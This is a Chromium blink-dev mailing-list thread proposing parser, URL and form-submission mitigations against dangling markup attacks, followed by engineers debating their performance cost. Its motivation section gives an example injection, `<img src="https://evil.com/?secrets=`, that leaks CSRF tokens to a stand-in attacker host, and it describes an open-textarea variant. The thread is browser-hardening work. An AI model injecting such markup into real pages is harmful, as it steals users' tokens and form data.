Intent to Implement: Dangling markup mitigations.

288 views
Skip to first unread message

Mike West

unread,
Jan 17, 2017, 5:43:26 AM1/17/17
to blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
(crossposted to blink-dev@ and security-dev@, and CCing some specific folks who might be interested)

# Contact Emails

# Spec
None yet. I will submit pull-requests to HTML if we decide that the experiments discussed below are at all reasonable.

# Summary
This Intent is a little vague, as I'm still exploring the space, but I'm adding metrics for a few concrete proposals, so poking at the list seems like a reasonable thing to do (both for visibility and for new/better ideas). In particular:

1.  https://codereview.chromium.org/2626243002 adds metrics for `\n` and `<` occurring inside `<base target>`.

2. https://codereview.chromium.org/2628723004 adds metrics for `<textarea>` and `<select>` being closed by end-of-file, and a flag to block form submission in those cases.

3. https://codereview.chromium.org/2629393002 adds metrics for `\n` and `<` characters occurring during URL parsing (e.g. as a result of processing `<img src>` or `<link href>`). https://codereview.chromium.org/2634893003 adds a flag to cause such resolutions to error out for non-`data:`/`javascript:` URLs.

It's not clear whether these mitigations will be effective or whether we'll need to address things in some other way. If/when we come to agreement on an approach, I'll come back to blink-dev@ with more specific intents to ship (intent to ships?).

# Motivation
Once we kill off XSS as a viable attack vector (which somehow seems to be taking marginally longer than expected *cough*), dangling markup attacks look like the next-softest target. I'm hopeful that we can mitigate the impact of this class of attack with some small changes to HTML's tokenizer/tree builder, URL resolution, and form submission.

For example, hidden form data (`<input type=hidden name=csrf value=token>`) can be exfiltrated via injections like `<img src="https://evil.com/?secrets=`. Since the injection leaves an open attribute, the page will be consumed until the next `"`, and the result will be nicely URL-encoded and delivered to the attacker via the image request.

Likewise, injecting an open `<textarea>` has a similar effect, as it also consumes the page until a closing `</textarea>` or EOF. Exfiltration here requires clickjacking the user, but that's not much of a speed bump.

# Interop Risk
Folks at Mozilla seem (reluctantly) on board with the general notion of changing form submission in https://github.com/whatwg/html/issues/2253. I haven't made concrete proposals for attribute values yet, but initial reactions are somewhat more skeptical.

I think we'll have deeper discussions once we know what the numbers look like, but I'm hopeful that we can agree upon a small and targeted set of changes that reasonably balances any added complexity against the mitigation we'd gain.

# Compat Risk
Unclear. The metrics I'm adding should give us some data about the impact on the status quo. It might turn out that the numbers are super-high in general, in which case my focus might shift to opt-in mechanisms that would allow developers to make individual decisions about risks. I'd prefer a change to the defaults, of course, but I'll take what I can get based on the numbers. :)

# Technical Constraints
None.

# All Blink Platforms?
Yes.

# OWP Bug

# Chromestatus
None yet; I'll create entries here once I have concrete proposals specced and tested.

# Requesting approval to ship?
Nope.

-mike

Elliott Sprehn

unread,
Jan 17, 2017, 7:27:10 PM1/17/17
to Mike West, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
I have a concern that this is going to make us slower. We already know that the parser is in general "slow" because it's so branchy. Simplification of the parser has yielded 20x+ improvements in experiments. I worry that adding even more complexity to the parser is doubling down on the slowness. I'm also concerned about making URL processing slower for pages with lots of urls like wikipedia articles and long email threads.

On Tue, Jan 17, 2017 at 2:43 AM, Mike West <mk...@chromium.org> wrote:
(crossposted to blink-dev@ and security-dev@, and CCing some specific folks who might be interested)

# Contact Emails

# Spec
None yet. I will submit pull-requests to HTML if we decide that the experiments discussed below are at all reasonable.

# Summary
This Intent is a little vague, as I'm still exploring the space, but I'm adding metrics for a few concrete proposals, so poking at the list seems like a reasonable thing to do (both for visibility and for new/better ideas). In particular:

1.  https://codereview.chromium.org/2626243002 adds metrics for `\n` and `<` occurring inside `<base target>`.

2. https://codereview.chromium.org/2628723004 adds metrics for `<textarea>` and `<select>` being closed by end-of-file, and a flag to block form submission in those cases.

This puts an extra branch (and a couple nested tests) in the clean up loop at the end of parsing, I guess most pages don't have lots of tags open though?
 

3. https://codereview.chromium.org/2629393002 adds metrics for `\n` and `<` characters occurring during URL parsing (e.g. as a result of processing `<img src>` or `<link href>`). https://codereview.chromium.org/2634893003 adds a flag to cause such resolutions to error out for non-`data:`/`javascript:` URLs.

This is putting 3 string scans over every URL we resolve in the engine just for a use counter. I'd actually like us to revert this one, I don't think we'd want to make the spec require this, but also I don't think we should be paying that cost on every URL for the entire document. Our URL processing is already a bottle neck on pages with lots of links like wikipedia.

Mike West

unread,
Jan 18, 2017, 1:42:14 AM1/18/17
to Elliott Sprehn, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
On Wed, Jan 18, 2017 at 1:26 AM, Elliott Sprehn <esp...@chromium.org> wrote:
I have a concern that this is going to make us slower. We already know that the parser is in general "slow" because it's so branchy. Simplification of the parser has yielded 20x+ improvements in experiments. I worry that adding even more complexity to the parser is doubling down on the slowness. I'm also concerned about making URL processing slower for pages with lots of urls like wikipedia articles and long email threads.

These are reasonable concerns. I hope we can find a happy balance between the kinds of protections we can build into the platform, and the cost of those protections.
 
On Tue, Jan 17, 2017 at 2:43 AM, Mike West <mk...@chromium.org> wrote:
(crossposted to blink-dev@ and security-dev@, and CCing some specific folks who might be interested)

# Contact Emails

# Spec
None yet. I will submit pull-requests to HTML if we decide that the experiments discussed below are at all reasonable.

# Summary
This Intent is a little vague, as I'm still exploring the space, but I'm adding metrics for a few concrete proposals, so poking at the list seems like a reasonable thing to do (both for visibility and for new/better ideas). In particular:

1.  https://codereview.chromium.org/2626243002 adds metrics for `\n` and `<` occurring inside `<base target>`.

2. https://codereview.chromium.org/2628723004 adds metrics for `<textarea>` and `<select>` being closed by end-of-file, and a flag to block form submission in those cases.

This puts an extra branch (and a couple nested tests) in the clean up loop at the end of parsing, I guess most pages don't have lots of tags open though?

That's my intuition, yes. I also explicitly called out perf as part of the review, and the html/parser OWNERS seemed unconcerned.

3. https://codereview.chromium.org/2629393002 adds metrics for `\n` and `<` characters occurring during URL parsing (e.g. as a result of processing `<img src>` or `<link href>`). https://codereview.chromium.org/2634893003 adds a flag to cause such resolutions to error out for non-`data:`/`javascript:` URLs.

This is putting 3 string scans over every URL we resolve in the engine just for a use counter. I'd actually like us to revert this one, I don't think we'd want to make the spec require this, but also I don't think we should be paying that cost on every URL for the entire document. Our URL processing is already a bottle neck on pages with lots of links like wikipedia.

That's fair. I'd naively considered scanning through a string for a single character "fast enough", thanks for the correction. With that in mind, though, we can do a lot better than the initial patch. I've uploaded https://codereview.chromium.org/2643613002 which should be significantly faster; I'd appreciate you taking a look.

-mike

Charles Harrison

unread,
Jan 18, 2017, 9:10:30 AM1/18/17
to Mike West, Kouhei Ueno, Elliott Sprehn, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
+kouhei, do we have any CPU bound html parser perf bots running? I was skeptical a few extra tests / branch would cause major problems but it would be much easier to review these patches if there was a low noise bot that would ding if we messed up.

WRT URL scanning. My measurements have shown that checking for URL whitespace (which is a simple loop with a single branch and a few tests) accounts for 1/4-1/5 of URL parsing for URLs without any whitespace (i.e. perfect branch prediction). So adding any simple scan through the URL will add at least that much overhead.

--
You received this message because you are subscribed to the Google Groups "blink-dev" group.
To unsubscribe from this group and stop receiving emails from it, send an email to blink-dev+unsubscribe@chromium.org.

Kouhei Ueno

unread,
Jan 18, 2017, 9:52:38 AM1/18/17
to Charles Harrison, Mike West, Elliott Sprehn, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
I chatted w/ esprehn@ about this. (please correct me if I got things wrong)
Some facts:
- HTML tokenizer / tree-builder is far from optimal. Internal experiment showed that it can be two orders of magnitude faster than its current state if we drastically simplify the grammar.
-- Even with the full spec grammar, I'm quite confident that we can apply modern interpreter optimization techniques to get close to that.
- However, the amount of time spent in tokenizer/tree-builder seems trivial compared to other components. Which doesn't really justify the optimization work atm.

re: https://codereview.chromium.org/2628723004 
We should keep an eye on PerformanceTests/Parser/tiny-innerHTML.html, but I'm also skeptical that this would run in to major problems. This adds a branch per HTMLToken in TextMode, but I don't expect large number of tokens to go through the tree builder (Multiple characters are buffered to a single Character HTMLToken), and we can optimize away the branch if we really need to by merging the state into InsertionMode.

+1 to csharrison@'s view of URL scanning.
--
kouhei

Dominic Cooney

unread,
Jan 18, 2017, 11:29:17 PM1/18/17
to Kouhei Ueno, Charles Harrison, Mike West, Elliott Sprehn, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
On Wed, Jan 18, 2017 at 11:52 PM, 'Kouhei Ueno' via blink-dev <blin...@chromium.org> wrote:
I chatted w/ esprehn@ about this. (please correct me if I got things wrong)
Some facts:
- HTML tokenizer / tree-builder is far from optimal. Internal experiment showed that it can be two orders of magnitude faster than its current state if we drastically simplify the grammar.

This reported number seems to vary a lot. Could someone share data?
 
-- Even with the full spec grammar, I'm quite confident that we can apply modern interpreter optimization techniques to get close to that.
- However, the amount of time spent in tokenizer/tree-builder seems trivial compared to other components. Which doesn't really justify the optimization work atm.

We do have a bunch of problems with the tree builder simulator and actual tree builder making different decisions, so maybe some improvements can ride along with fixing the correctness. I would still like to help with this, I'm just a bit oversubscribed.

Adam Barth

unread,
Jan 19, 2017, 12:20:25 AM1/19/17
to Dominic Cooney, Kouhei Ueno, Charles Harrison, Mike West, Elliott Sprehn, blink-dev, security-dev, Michal Zalewski, Artur Janc, Eduardo' Vela, Sebastian Lekies
On Wed, Jan 18, 2017 at 8:29 PM Dominic Cooney <domi...@chromium.org> wrote:
On Wed, Jan 18, 2017 at 11:52 PM, 'Kouhei Ueno' via blink-dev <blin...@chromium.org> wrote:
I chatted w/ esprehn@ about this. (please correct me if I got things wrong)
Some facts:
- HTML tokenizer / tree-builder is far from optimal. Internal experiment showed that it can be two orders of magnitude faster than its current state if we drastically simplify the grammar.

This reported number seems to vary a lot. Could someone share data?

The number we measured in the experiment was 19x faster at parsing.  The corpus we parsed was the HTML specification (at the time, which was a few years ago).  Obviously, the parser resulted in a different DOM, so the comparison isn't as direct as between two implementations that produce the same DOM.

Adam

Reply all
Reply to author
Forward
0 new messages